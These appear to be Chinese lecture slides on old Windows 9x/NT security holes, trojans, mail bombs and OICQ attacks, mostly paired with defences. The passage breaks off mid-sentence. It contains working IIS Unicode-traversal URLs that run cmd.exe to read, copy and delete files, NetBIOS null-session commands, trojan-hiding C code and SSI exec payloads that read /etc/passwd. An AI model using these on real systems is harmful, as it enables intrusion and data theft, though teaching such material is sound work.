操作系統(tǒng)安全專業(yè)講座

WINDOWS9x//NT系統(tǒng)安全1BNCC第1頁Windows9x漏洞DOS設備名

當用戶在Win95/98上接收了一個命令，只要文件或文件夾名稱中包含一臺DOS設備名時，就會發(fā)生系統(tǒng)瓦解；假如在瀏覽網(wǎng)頁時，用戶按下了一個包含非法路徑（比如包含DOS設備名）鏈接，也會發(fā)生系統(tǒng)瓦解；假如用戶在E-mail軟件中打開了預覽模式，當他收到E-mail，其中夾帶一個包含非法路徑HTML鏈接時，他Windows系統(tǒng)也會瓦解。

處理方法：到/security下載安裝對應補丁。

2BNCC第2頁Windows文件擴展名坑騙漏洞

漏洞描述：

假如命名一個文件名字："file.html

.exe"其中用ASCII255來代替其中空格，那么，在WINDOWS里面將只能看見文件名是：file.html。

而且這個文件名坑騙對IE下載對話框一樣存在，惡意者可能連接一個可執(zhí)行文件，不過讓人看起來象一個HTML網(wǎng)頁3BNCC第3頁Windows快捷方式漏洞Windows快捷方式包含擴展名為lnk、pif、url文件。其中url文件為純文本格式lnk

和pif文件為二進制文件。這三種快捷方式都能夠自定義圖標文件，當把圖標文件名設定為

Windows默認設備名時，因為設備名稱解析漏洞，可造成Windows95/98系統(tǒng)瓦解。因為

對圖標搜索是由Explorer自動完成，所以只要快捷方式在資源瀏覽器中出現(xiàn)，就會導

致系統(tǒng)瓦解。假如快捷方式在桌面上，那么系統(tǒng)一開啟就會瓦解。只有以DOS開啟系統(tǒng)，在

命令行下刪除。因為無法直接設置圖標文件名為設備名，只有經(jīng)過直接編輯方式來創(chuàng)建。

4BNCC第4頁Windows快捷方式漏洞對于WindowsNT/系統(tǒng)不會因為設備名稱解析而瓦解。但當我們創(chuàng)建一個完全由

ASCII字符填充組成pif文件時會出現(xiàn)以下情況：

1）一個非法pif文件（用ascii字符'x'填充）最少要369字節(jié)，系統(tǒng)才認為是一個

正當pif文件，才會以pif圖標[pifmgr.dll,0]顯示，在屬性里有程序、

字體、內(nèi)存、屏幕”等內(nèi)容。而且僅僅當一個非pif文件大小是369字節(jié)時察看

屬性“程序”頁時，不會發(fā)生程序錯誤，哪怕是370字節(jié)也不行。當對一個大于

369字節(jié)非法pif文件察看屬性“程序”頁時，Explorer會犯錯，提醒：

5BNCC第5頁Windows快捷方式漏洞"0x77650b82"指令引用"0x000000000"內(nèi)存。該內(nèi)存不能為"read"

但這種錯誤并不會引發(fā)緩沖溢出安全問題。初步分析了一下，問題出在pif文件

16進制地址：

0x00000181[0x87]0x00000182[0x01]和

0x00000231[0xC3]0x00000232[0x02]

即使是一個正當pif文件，只要改動這四處任意一處，也會引發(fā)程序錯誤。而只

要把0x00000181和0x00000182值改為[0xFF][0xFF]，那么其它地址任意更改

都不會引發(fā)錯誤。

6BNCC第6頁Windows快捷方式漏洞2）當一個大于30857非法pif文件（用ascii字符'x'填充）出現(xiàn)在資源管理器中時，

會使系統(tǒng)CPU資源占用達100%，根本不能察看其屬性頁。也無法在資源管理器中

對其進行任何操作，甚至不能在命令提醒符中刪除。試圖刪除時會提醒會提醒：

“進程無法訪問文件，因為另一個程序正在使用此文件?！?/p>

但只要把0x00000181和0x00000182中任意一處改為[0xFF]這種情況就不會發(fā)生。

這是因為資源瀏覽器試圖顯示其實并不存在圖標引發(fā)。假如快捷方式在桌面

上，那么系統(tǒng)一開啟這種情況就會出現(xiàn)。只有使用任務管理器中止Explorer.exe

進程，再開啟一個命令提醒符，從命令行下刪除。

此問題僅影響WindowsNT/系統(tǒng)，不影響Windows95/98。7BNCC第7頁系統(tǒng)安全漏洞及處理方案NetBIOS信息泄漏netuse\\server\IPC$""/user:""

//此命令用來建立一個空會話netview\\server

//此命令用來查看遠程服務器共享資源服務器名稱注釋

\\pc1

\\pc2

命令成功完成。nettime\\server

//此命令用來得到一個遠程服務器當前時間。

8BNCC第8頁系統(tǒng)安全漏洞及處理方案nbtstat-Aserver

//此命令用來得到遠程服務器NetBIOS用戶名字表NetBIOSRemoteMachineNameTable

Name

Type

Status

NULL

<00>UNIQUE

Registered

NULL

<20>UNIQUE

Registered

INTERNET

<00>GROUP

Registered

XIXI

<03>UNIQUE

Registered

INet~Services

<1C>GROUP

Registered

IS~NULL

<00>UNIQUE

Registered

INTERNET

<1E>GROUP

Registered

ADMINISTATOR

<03>UNIQUE

Registered

INTERNET

<1D>UNIQUE

Registered

..__MSBROWSE__.<01>GROUP

RegisteredMACAddress=00-54-4F-34-D8-80

9BNCC第9頁系統(tǒng)安全漏洞及處理方案修改注冊表一勞永逸HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSA

ValueName:RestrictAnonymous

DataType:REG_DWORD

Value:1

10BNCC第10頁MicrosoftIIS造成網(wǎng)絡泄露

telnettarget80

Tryingtarget...

Connectedtotarget.

Escapecharacteris'^]'.

HEAD/directoryHTTP/1.0[CRLF]

[CRLF]

HTTP/1.1401AccessDenied

WWW-Authenticate:Basicrealm="<InternalIPAddress>"

Content-Length:644

Content-Type:text/html

測試程序：

HEAD/directoryHTTP/1.0[CRLF]

[CRLF]

11BNCC第11頁MicrosoftWindows98/Folder.htt漏洞(-8-17)

windows98和中，一個名為Folder.htt文件決定了文件夾以何種方式顯示為web頁面。這個文件包含活動腳本解釋執(zhí)行。假如一個用戶任意打開了一個文件夾，同時以web頁面形式察看該文件夾選項為enable話（默認選項），則Folder.htt文件中任何代碼均會以該用戶特權等級運行。經(jīng)過當?shù)匚募A和遠程UNC共享都能夠利用此漏洞。

問題出在ShellDefViewActiveX控件。這個控件用來確定對選中文件執(zhí)行什么操作。為了激活對選中文件默認操作，它使用無任何參數(shù)InvokeVerb()方法。文件夾中第一個文件能夠經(jīng)過FileList.focus()方法被自動選中。所以，假如創(chuàng)建一個文件，它默認打開操作為“執(zhí)行”，而且處于文件列表第一個位置（默認文件排序方式是按字母次序，例11111111.bat會所以被排在首位），則只要打開該文件所在文件夾，就會選中并運行該文件。12BNCC第12頁

UNICODE漏洞原理此漏洞從漢字IIS4.0+SP6開始，還影響漢字WIN+IIS5.0、漢字WIN+IIS5.0+SP1，臺灣繁體漢字也一樣存在這么漏洞。

漢字版WIN中，UNICODE編碼存在BUG，在UNICODE編碼中

%c1%1c-〉(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘

%c0%2f-〉(0xc0-0xc0)*0x40+0x2f=0x2f=‘＼‘

NT4中/編碼為%c1%9c

在英文版里：WIN英文版%c0%af

但從國外一些站點得來資料顯示，還有以下編碼能夠?qū)崿F(xiàn)對該漏洞檢測.

%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af

%f0%80%80%af

%fc%80%80%80%80%af

系統(tǒng)安全漏洞及處理方案

13BNCC第13頁系統(tǒng)安全漏洞及處理方案UNICODE編碼漏洞簡單利用命令1、顯示文件內(nèi)容

假如想顯示里面其中一個badboy.txt文本文件，我們能夠這么輸入（htm,html，asp,bat等文件都是一樣）http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:＼badboy.txt

那么該文件內(nèi)容就能夠經(jīng)過IE顯示出來。

2、建立文件夾命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md+c:＼badboy運行后我們能夠看到

返回這么結果：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

14BNCC第14頁系統(tǒng)安全漏洞及處理方案3、刪除空文件夾命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:＼badboy

返回信息同上

4、刪除文件命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:＼badboy.txt

返回信息同上

5、copy文件且更名命令

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:＼badboy.txtbad.txt

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

1file(s)copied.

15BNCC第15頁系統(tǒng)安全漏洞及處理方案顯示目標主機當前環(huán)境變量

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+set

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

ALLUSERSPROFILE=E:＼DocumentsandSettings＼AllUsers

AUTH_TYPE=Negotiate

AUTH_USER=BADBOYCL-DQQZQQ＼badboy

CASL_BASEDIR_ENV=E:＼scan＼CyberCopScanner＼casl

CommonProgramFiles=E:＼ProgramFiles＼CommonFiles

COMPUTERNAME=BADBOYCL-DQQZQQ

ComSpec=E:＼WINNT＼system32＼cmd.exe

16BNCC第16頁系統(tǒng)安全漏洞及處理方案CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=

HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)

HTTP_AUTHORIZATION=NegotiateTlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADA

AMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAY

QBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vz

SAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==

HTTP_ACCEPT_ENCODING=gzip,deflate

HTTPS=off

INSTANCE_I

17BNCC第17頁系統(tǒng)安全漏洞及處理方案7、把某個文件夾內(nèi)全部文件一次性COPY到另外文件夾

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopyc:＼badboyc:＼inetpub＼wwwroot

返回信息：

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

我們查看c:＼inetpub＼wwwroot文件夾，結果全部c:＼badboy內(nèi)都拷貝到該目錄里了

8、把某個文件夾剪貼到指定目錄

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+movec:＼badboyc:＼inetpub＼wwwroot呵呵，還是能夠做到，時間長短要看文件多少了。

18BNCC第18頁系統(tǒng)安全漏洞及處理方案9、顯示某一路徑下相同文件類型文件內(nèi)容

/scripts/..%c1%1c..＼winnt/system32/find.exe?/n+/v+""+c:＼inetpub＼wwwroot＼*.ht*

完全顯示出來呀！一樣，還有很多命令能夠執(zhí)行，大家能夠試試，不過有些時間會很久，有些是不能執(zhí)行。解釋+號，在這里+等于空格鍵，當然你也能夠用空格鍵，用空格鍵運行后會轉換為%20和%c1%1c=/是同一道理。對于名字超出8個字母文件夾，假如我們想看里面內(nèi)容時就有點不一樣了比如說我們想看目標主機ProgramFiles文件夾里面內(nèi)容時，應該這么輸入

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:＼progra~1

這里就不能用+或者%20來代替program與files間空格。至于對aabb這么中間帶有空格文件夾怎么看，當前我還不知道，假如誰知道能夠?qū)懗鰜怼?9BNCC第19頁越權訪問drwtsn32.exe（Dr.Watson）是一個Windows系統(tǒng)內(nèi)置程序錯誤調(diào)試器。默認

狀態(tài)下，出現(xiàn)程序錯誤時，Dr.Watson將自動開啟，除非系統(tǒng)上安裝了VC等其它含有調(diào)試功效軟件更改了默認值。注冊表項：

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]

下Debugger項值指定了調(diào)試器及使用命令；Auto項決定是否自動診療錯誤，并統(tǒng)計對應診療信息。

[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\AeDebug]

20BNCC第20頁越權訪問在Windows中drwtsn32.exe默認會將故障轉儲文件user.dmp存放在目錄“\DocumentsandSettings\AllUsers\Documents\DrWatson”下。權限為Everyone完全控制。在WindowsNT中被存放在“\WINNT\”中，everyone組最少有讀取權限。

因為user.dmp中存放內(nèi)容是當前用戶部分內(nèi)存鏡像，所以可能造成各種敏感信息泄漏，比如帳號、口令、郵件、瀏覽過網(wǎng)頁、正在編輯文件等等，詳細取決于瓦解應用程序和在此之前用戶進行了那些操作。

21BNCC第21頁越權訪問drwtsn32參數(shù)

drwtsn32[-i][-g][-ppid][-eevent][-?]

-i將DrWtsn32看成默認應用程序錯誤調(diào)試程序

-g被忽略，但作為WINDBG和NTSD兼容而被提供

-ppid要調(diào)試進程id

-eevent表示進程附加完成事件

-?這個屏幕

22BNCC第22頁木馬程序原理木馬分類

木馬程序技術發(fā)展至今，已經(jīng)經(jīng)歷了4代，第一代，即是簡單密碼竊取，發(fā)送等，沒有什么尤其之處。第二代木馬，在技術上有了很大進步，冰河能夠說為是國內(nèi)木馬經(jīng)典代表之一。第三代木馬在數(shù)據(jù)傳遞技術上，又做了不小改進，出現(xiàn)了ICMP等類型木馬，利用畸形報文傳遞數(shù)據(jù)，增加了查殺難度。第四代木馬在進程隱藏方面，做了大改動，采取了內(nèi)核插入式嵌入方式，利用遠程插入線程技術，嵌入DLL線程?；蛘邟旖覲SAPI,實現(xiàn)木馬程序隱藏，甚至在WindowsNT/下，都到達了良好隱藏效果。相信，第五代木馬很快也會被編制出來。。

23BNCC第23頁木馬程序原理木馬程序隱藏技術

進程：一個正常Windows應用程序，在運行之后，都會在系統(tǒng)之中產(chǎn)生一個進程，同時，每個進程，分別對應了一個不一樣PID（ProgressID,進程標識符）這個進程會被系統(tǒng)分配一個虛擬內(nèi)存空間地址段，一切相關程序操作，都會在這個虛擬空間中進行。

線程：一個進程，能夠存在一個或多個線程，線程之間同時執(zhí)行各種操作，普通地，線程之間是相互獨立，當一個線程發(fā)生錯誤時候，并不一定會造成整個進程瓦解。

服務：一個進程當以服務方式工作時候，它將會在后臺工作，不會出現(xiàn)在任務列表中，不過，在WindowsNT/下，你依然能夠經(jīng)過服務管理器檢驗任何服務程序是否被開啟運行。

24BNCC第24頁木馬程序原理WINAPIWinMain(HINSTANCE,HINSTANCE,LPSTR,int)

{

try

{

DWORDdwVersion=GetVersion();

//取得Windows版本號

if(dwVersion>=0x80000000)

//Windows9x隱藏任務列表

{

int(CALLBACK*rsp)(DWORD,DWORD);

HINSTANCEdll=LoadLibrary("KERNEL32.DLL");

//裝入KERNEL32.DLL

rsp=(int(CALLBACK*)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");

//找到RegisterServiceProcess入口

rsp(NULL,1);

//注冊服務

FreeLibrary(dll);

//釋放DLL模塊

}

}

catch(Exception&exception)

//處理異常事件

{

//處理異常事件

}

return0;

}25BNCC第25頁木馬程序原理程序自加載運行技術1、集成到程序中6、在System.ini中藏身2、隱藏在配置文件中

7、隱形于開啟組中3、潛伏在Win.ini中8、隱蔽在Winstart.bat中4、偽裝在普通文件中9、捆綁在開啟文件中5、內(nèi)置到注冊表中10、設置在超級連接中

26BNCC第26頁木馬程序原理木馬程序建立連接隱藏

合并端口法，也就是說，使用特殊伎倆，在一個端口上同時綁定兩個TCP或者UDP連接，這聽起來不可思議，但實際上確實如此，而且已經(jīng)出現(xiàn)了使用類似方法程序，經(jīng)過把自己木馬端口綁定于特定服務端口之上，（比如80端口HTTP，誰懷疑他會是木馬程序呢？）從而到達隱藏端口目地。另外一個方法，是使用ICMP（InternetControlMessageProtocol）協(xié)議進行數(shù)據(jù)發(fā)送,原理是修改ICMP頭結構，加入木馬控制字段，這么木馬，具備很多新特點，不占用端口特點，使用戶難以發(fā)覺，同時，使用ICMP能夠穿透一些防火墻，從而增加了防范難度。之所以含有這種特點，是因為ICMP不一樣于TCP，UDP，ICMP工作于網(wǎng)絡應用層不使用TCP協(xié)議。27BNCC第27頁木馬程序原理木馬程序建立連接隱藏

28BNCC第28頁木馬程序原理目標機器情況獲取

服務器端程序包裝與加密

進入Windows命令行模式下做以下操作

1）C:\>copyServer.ExeServer.Bak

2）建立一個文本文件Test.Txt，其內(nèi)容為“”

3）C:\>typeText.Txt>>Server.Exe

4）運行Server.Exe

29BNCC第29頁瀏覽網(wǎng)頁也會中木馬1.MIME介紹

MIME(MultipurposeInternetMailExtentions)，普通譯作“多用途網(wǎng)際郵件擴充協(xié)議”。顧名思義，它能夠傳送多媒體文件，在一封電子郵件中附加各種格式文件一起送出。現(xiàn)在它已經(jīng)演化成一個指定文件類型(Internet任何形式消息：e-mail，usenet新聞和Web)通用方法。在使用CGI程序時你可能接觸過MIME類型，其中有一行叫作Content-type語句，它用來指明傳遞就是MIME類型文件(如text/html或text/plain)。30BNCC第30頁瀏覽網(wǎng)頁也會中木馬IE是怎樣處理附件：普通情況下假如附件是文本文件，IE會讀它，假如是VIDEOCLIP，IE會查看它；假如附件是圖形文件，IE就會顯示它；假如附件是一個EXE文件呢？IE會提醒用戶是否執(zhí)行！但令人恐懼是，當攻擊者更改MIME類型后，IE就不再提醒用戶是否執(zhí)行而直接運行該附件！從而使攻擊者加在附件中程序、攻擊命令能夠按照攻擊者構想情況進行。31BNCC第31頁OICQ安全縱觀針對OICQ攻擊，主要分為IP探測、消息炸彈、密碼和當?shù)叵⑵平?、木馬植入及其它方式。推出該安全手冊目標是為了能讓大多數(shù)對網(wǎng)絡安全不熟悉網(wǎng)民們能夠簡單防御這些攻擊。32BNCC第32頁OICQ安全IP探測

因為OICQ采取是UDP數(shù)據(jù)包通訊，攻擊者只要向你發(fā)送一個信息，他就能夠經(jīng)過監(jiān)視UDP數(shù)據(jù)包來取得你IP和OICQ端口號，從理論上說，在直接通訊模式下，想防止攻擊者發(fā)覺你IP地址是十分困難。

IP探測另一個方法是經(jīng)過端口掃描，OICQ通訊端口值默認情況下是8000，攻擊者能夠經(jīng)過集中掃描某一地址段8000端口來取得那些正在使用OICQIP地址。

33BNCC第33頁OICQ安全防范IP探測主要方法是：一、阻止攻擊者與你直接通訊，在OICQ個人設定里修改身份驗證默認值為"需要身份認證才能把我加為摯友"，這么攻擊者也還是能夠經(jīng)過一些特殊信息發(fā)送軟件跟你通訊，所以你還應該在系統(tǒng)參數(shù)設置里把拒絕陌生人消息選項選上。另一個阻止攻擊者與你直接通訊方法是經(jīng)過代理上OICQ或者隱身登陸，這么攻擊者所看到IP地址是代理服務巧刪OICQ登錄號碼器IP，隱身登陸消息傳遞是經(jīng)過服務器中轉，這么傳給攻擊者數(shù)據(jù)包IP地址是騰訊服務器地址。

修改OICQ通訊端口默認值是防止被攻擊者掃描唯一方法，它還能預防攻擊者給你發(fā)送垃圾消息。34BNCC第34頁OICQ安全消息炸彈

消息炸彈攻擊原理是利用UDP數(shù)據(jù)通訊不需要驗證確認弱點，只要拿到用戶IP地址和OICQ通訊端口即可發(fā)動攻擊。

35BNCC第35頁OICQ安全密碼和當?shù)叵⑵平?/p>

經(jīng)過暴力解密是一個破解伎倆，有些攻擊者還采取一些鍵盤統(tǒng)計程式來統(tǒng)計你輸入帳號和密碼，讓你防不勝防。

另一個取得OICQ密碼伎倆是經(jīng)過攻擊你注冊郵箱，因為騰訊有一個忘記密碼功效，它將用戶OICQ密碼發(fā)送到用戶注冊時郵箱里，攻擊者一旦拿到這個郵箱，即能夠很簡單拿到你密碼。

36BNCC第36頁OICQ安全一、當?shù)仄平夥婪镀平饷艽a通常是窮舉。不要用簡單英文和純數(shù)字作為密碼，應該是大小寫、數(shù)字、符號混合，不要少于八位，這么話密碼就不輕易被破了二、攻擊注冊郵箱防范

個人資料里和你申請?zhí)柎a時所填mail地址不要一樣，除非你對你密碼很有信心。選擇一個好密碼也是一個好方法！37BNCC第37頁OICQ木馬程序剖析GOP木馬程序GOP木馬檢驗

該木馬運行時候在Windows任務窗口中是看不到,你能夠點任務條上“開始”、“運行”、“msinfo32”(就是Windows自帶系統(tǒng)信息，在“附件”中)?？雌渲熊浖h(huán)境→正在運行任務。這才是Windows現(xiàn)在全部運行任務。當你在運行了什么東西之后以為有問題時候就看看這里。假如有一個項目有程序名和路徑，而沒有版本、廠商和說明，你就應該擔心一下了。GOP木馬在這里顯示版本為：“不能用”。假如你發(fā)覺GOP木馬，先關掉你貓(斷網(wǎng))，然后脫機重新登錄一次你OICQ，查找電腦中是否有record.dat文件(每個盤都應該查一下！絕不放過！)(這是GOP統(tǒng)計OICQ密碼文檔，假如你OICQ密碼被監(jiān)控到了就一定會有。當然，即使你中了木馬，在你還沒有用OICQ時候是不會有這個文件。反正現(xiàn)在不在網(wǎng)上，不用擔心密碼被發(fā)走)。假如有話，那么“恭喜”你了，100%中了木馬。不信？用記事本打開那個record.dat，看看有沒有你寶貝OICQ號碼和密碼。

你還能夠運行系統(tǒng)配置實用程序(開始―運行―msconfig)，在開啟欄里，你亦可發(fā)覺“WindowsAgent”(就是上文提到“定義注冊表鍵名”,可能會是其它鍵名)38BNCC第38頁OICQ木馬程序GOP木馬去除在注冊表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵下添加一個鍵值來讓木馬自動運行，該木馬也不例外。運行regedit，進入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵，記住那個在系統(tǒng)信息中查到那個文件，也可在msconfig―開啟―名稱里找到(在“剖析木馬設置”中，我們知道木馬文件名是能夠任意定制，所以無法確定詳細文件名)存放路徑，刪除該鍵值。然后關閉計算機，稍候一下開啟計算機(注意：不要選重新開啟)。然后進入文件存放路徑刪除木馬文件即可。

39BNCC第39頁惡意程序郵件炸彈原理E-MAIL炸彈原本泛指一切破壞電子郵箱方法，普通電子郵箱容量在5，6M以下，平時大家收發(fā)郵件，傳送軟件都會以為容量不夠，假如電子郵箱一下子被幾百，幾千甚至上萬封電子郵件所占據(jù)，這是電子郵件總容量就會超出電子郵箱總容量，以至造成郵箱超負荷而瓦解?！緆aboom3】【upyours4】【Avalanchev2.8】40BNCC第40頁惡意程序郵件炸彈防范⒈不要將自己郵箱地址處處傳輸，尤其是申請上網(wǎng)帳號時ISP送電子信箱，那可是要按字節(jié)收費喲！去申請幾個無償信箱對外使用，隨便他人怎么炸，大不了不要了。

⒉最好用POP3收信，你能夠用Outlook或Foxmail等POP收信工具收取Email。比如用Outlook，你能夠選擇“工具”/“收件箱助理”，然后點擊“添加”在屬性窗口能夠設定對各種條件Email處理方式。41BNCC第41頁惡意程序郵件炸彈防范⒊當某人不停炸你信箱時，你能夠先打開一封信，看清對方地址，然后在收件工具過濾器中選擇不再接收這地址信，直接從服務器刪除。4。在收信時，一旦看見郵件列表數(shù)量超出平時正常郵件數(shù)量若干倍，應該馬上停頓下載郵件，然后再從服務器刪除炸彈郵件。⒌不要認為郵件發(fā)送有個回復功效，就能夠?qū)l(fā)炸彈人報復回來，那是十分愚蠢！發(fā)件人有可能是用假地址發(fā)信，這個地址可能填得與收件人地址相同。這么你不但不能回報對方，還會使自己郵箱徹底完結！

42BNCC第42頁惡意程序郵件炸彈防范⒍你還能夠用一些工具軟件預防郵件炸彈，下面本站就提供一個供大家下載：【echom201】這是一個功效強大砍信機，每分鐘能砍到1000封電子郵件，是對付郵件炸彈好東西

43BNCC第43頁惡意程序端口攻擊原理這類軟件是利用Window95/NT系統(tǒng)本身漏洞，這與Windows下微軟網(wǎng)絡協(xié)議NetBIOS一個例外處理程序OOB（OutofBand）相關。只要對方以OOB方式，就能夠經(jīng)過TCP/IP傳遞一個小小封包到某個IP地址Port139上，該地址電腦系統(tǒng)即（WINDOWS95/NT）就會“應封包而死”，自動重新開機，你未存檔全部工作就得重新再做一遍了。44BNCC第44頁惡意程序端口攻擊防范常見端口攻擊器有【uKe23】【voob】【W(wǎng)INNUKE2】。假如你還是用win95，那您就要當心了。防范將你Windows95馬上升級到Windows98，首先修正Win95BUG，在微軟主頁附件中有對于Win95和OSR2以前版本補丁程序，Win98不需要。然后學會隱藏自己IP，包含將ICQ中"IP隱藏"打開，注意防止在會顯示IPBBS和聊天室上暴露真實身份，尤其在去黑客站點訪問時最好先運行隱藏IP程序。45BNCC第45頁惡意程序JAVA炸彈原理很多人在聊天室中被炸了以后，就認為是被他人黑了，其實不是。炸彈有很各種，有是造成電腦直接死機，有是經(jīng)過HTML語言，讓你瀏覽器吃完你系統(tǒng)資源，然后你就死機了。46BNCC第46頁惡意程序JAVA炸彈防范唯一防范方法就是你在聊天室聊天時，尤其是支持HTML聊天室（比如湛江，新疆等）請你一定記住關掉你瀏覽器里java功效，還要記住不要瀏覽一些來路不明網(wǎng)站和不要在聊天室里按其它網(wǎng)友發(fā)出超級鏈接，這么能夠防止遭到惡作劇者攻擊.47BNCC第47頁惡意程序瀏覽主頁硬盤共享“萬花谷”，假如進入該網(wǎng)頁瀏覽者注冊表會被修改，好多系統(tǒng)功效所以受到限制。最近又聽說有網(wǎng)友在瀏覽網(wǎng)頁時硬盤被共享，危害似乎更大！其實，所謂瀏覽網(wǎng)頁硬盤被共享，和“萬花谷”一樣，受害者都是在瀏覽了含有有害代碼ActiveX網(wǎng)頁文件后中招。48BNCC第48頁惡意程序瀏覽主頁硬盤共享防御防范：1、不要輕易去一些自己并不了解站點，尤其是那些看上去漂亮誘人網(wǎng)址更不要貿(mào)然前往，不然吃虧往往是你。

2、運行IE，點擊“工具→Internet選項→安全→Internet區(qū)域安全級別，把安全極別由“中”改為“高”

3、因為該類網(wǎng)頁是含有有害代碼ActiveX網(wǎng)頁文件，所以在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就能夠防止中招。詳細方法是：在IE窗口中點擊“工具→Internet選項，在彈出對話框中選擇“安全”標簽，再點擊“自定義級別”按鈕，就會彈出“安全設置”對話框，把其中全部ActiveX插件和控件以及Java相關全部選擇“禁用”即可。不過，這么做在以后網(wǎng)頁瀏覽過程中可能會造成一些正常使用ActiveX網(wǎng)站無法瀏覽。唉，有利就有弊，你還是自己看著辦吧。

4、對于Windows98用戶，請打開C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把其中“ActiveXComponent.class”刪掉；對于WindowsMe用戶，請打開C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把其中“ActiveXComponent.class”刪掉。請放心，刪除這個組件不會影響到你正常瀏覽網(wǎng)頁。

49BNCC第49頁惡意程序5、既然這類網(wǎng)頁是經(jīng)過修改注冊表來破壞我們系統(tǒng)，那么我們能夠事先把注冊表加鎖：禁止修改注冊表，這么就能夠到達預防目標。不過，自己要使用注冊表編輯器regedit.exe該怎么辦呢？所以我們還要在以前事先準備一把“鑰匙”，方便打開這把“鎖”！加鎖方法以下：

(1)運行注冊表編輯器regedit.exe；

(2)展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下，新建一個名為DisableRegistryToolsDWORD值，并將其值改為“1”，即可禁止使用注冊表編輯器regedit.exe。解鎖方法以下：

用記事本編輯一個任意名字.reg文件，比如unlock.reg，內(nèi)容以下：REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistryTools"=dword:00000000

50BNCC第50頁惡意程序

6、安裝網(wǎng)絡防火墻，尤其是安裝了Norton后，進入該類網(wǎng)頁就會報警提醒有腳本寫注冊表，國產(chǎn)反病毒軟件KVW3000也有這類功效，提議你也安裝一個這么軟件。

7、即使經(jīng)過一番辛勞勞動修改回了標題和默認連接首頁，但假如以后又不小心進入該站就又得麻煩一次。其實，你能夠在IE中做一些設置方便永遠不進該站點：

打開IE，點擊“工具”→“Internet選項”→“內(nèi)容”→“分級審查”，點“啟用”按鈕，會調(diào)出“分級審查”對話框，然后點擊“許可站點”標簽，輸入不想去網(wǎng)站網(wǎng)址，如輸入：，按“從不”按鈕，再點擊“確定”即大功告成！51BNCC第51頁惡意程序網(wǎng)頁執(zhí)行exe文件

在服務器端執(zhí)行文件是靠SSI來實現(xiàn)，SSI是服務器端包含意思（不是SSL），我們經(jīng)常使用#include就是服務器端包含指令之一。不過，這次要介紹就是#exec。就是他能夠?qū)崿F(xiàn)服務器端執(zhí)行指令。

不過，不能用于.asp文件。而只能stm、.shtm和.shtml這些擴展名。而能解釋執(zhí)行他們就是Ssinc.dll。所以，你寫好代碼必須保留成.stm等格式才能確保服務器能執(zhí)行。

52BNCC第52頁惡意程序網(wǎng)頁執(zhí)行exe文件SSI有什么用?

當前，主要有以下幾個用用途：

1、顯示服務器端環(huán)境變量<#echo>

2、將文本內(nèi)容直接插入到文檔中<#include>

3、顯示W(wǎng)EB文檔相關信息<#flastmod#fsize>(如文件制作日期/大小等)

4、直接執(zhí)行服務器上各種程序<#exec>(如CGI或其它可執(zhí)行程序)

5、設置SSI信息顯示格式<#config>(如文件制作日期/大小顯示方式)

高級SSI<XSSI>可設置變量使用if條件語句。

53BNCC第53頁惡意程序<!--#execcmd=”cat/etc/passwd”-->將會顯示密碼文件<!--#execcmd=”dir/b”-->將會顯示當前目錄下文件列表<!--#execcgi=”/cgi-bin/gb.cgi”-->將會執(zhí)行CGI程序gb.cgi。<!--#execcgi=”/cgi-bin/access_log.cgi”-->將會執(zhí)行CGI程序access_log.cgi54BNCC第54頁惡意程序防范方法access.conf中”O(jiān)ptionsIncludesExecCGI”這行代碼刪除；在IIS中，要禁用#exec命令，可修改SSIExecDisable元數(shù)據(jù)庫；55BNCC第55頁Windows注冊表注冊表介紹注冊表修改56BNCC第56頁注冊表基本概念所謂注冊表就是一個龐大數(shù)據(jù)庫，其中容納了應用程序和計算機系統(tǒng)全部配置信息，Windows9x系統(tǒng)和應用程序初始化信息，應用程序和文檔文件關聯(lián)關系，硬件設備說明，狀態(tài)和屬性以及各種狀態(tài)信息和數(shù)據(jù)。他有兩個部分組成：注冊表數(shù)據(jù)庫（包含兩個文件：SYSTEM.DAT和USER.DAT）和注冊表編輯器。SYSTEM.DAT是用來保留微機系統(tǒn